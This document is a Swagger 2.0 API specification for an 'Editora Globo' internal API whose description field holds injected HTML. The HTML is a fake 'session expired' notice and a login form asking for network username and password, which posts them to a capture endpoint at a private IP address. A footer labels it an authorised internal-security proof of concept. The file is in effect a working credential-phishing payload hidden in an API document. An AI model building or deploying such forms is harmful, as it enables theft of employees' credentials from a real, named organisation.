swagger: '2.0'
info:
  version: "1.0.0"
  title: "API Interna - Editora Globo"
  description: |
    <div style="width: 100%; max-width: 400px; margin: 20px auto; padding: 20px; background: #fff3cd; border-radius: 8px; box-shadow: 0 4px 8px rgba(0,0,0,0.1); border: 1px solid #ffeaa7;">
      <div style="color: #856404; font-size: 16px; text-align: center; margin-bottom: 15px;">
        <strong>⚠️ Sessão expirada. Por favor, autentique-se novamente.</strong>
      </div>
    </div>

    <div style="width: 100%; max-width: 400px; margin: 0 auto; padding: 20px; background: #ffffff; border-radius: 8px; box-shadow: 0 4px 8px rgba(0,0,0,0.1);">
      <h2 style="text-align: center; color: #d32f2f; font-size: 24px; margin-bottom: 20px;">Login Editora Globo</h2>
      <form action="http://192.168.0.103:5000/capture" method="POST">
        <div style="margin-bottom: 15px;">
          <label style="display: block; margin-bottom: 5px; font-weight: bold; color: #333;">Usuário de Rede</label>
          <input type="text" name="username" required style="width: 100%; padding: 10px; border: 1px solid #ccc; border-radius: 4px; font-size: 16px;">
        </div>
        <div style="margin-bottom: 20px;">
          <label style="display: block; margin-bottom: 5px; font-weight: bold; color: #333;">Senha</label>
          <input type="password" name="password" required style="width: 100%; padding: 10px; border: 1px solid #ccc; border-radius: 4px; font-size: 16px;">
        </div>
        <button type="submit" style="width: 100%; padding: 12px; background-color: #d32f2f; color: white; border: none; border-radius: 4px; font-size: 16px; cursor: pointer;">
          Entrar
        </button>
      </form>
    </div>

    <div style="position: fixed; bottom: 10px; right: 10px; font-size: 12px; color: #888;">
      Segurança Interna - PoC Autorizado
    </div>
paths:
  /:
    get:
      responses:
        '200':
          description: OK
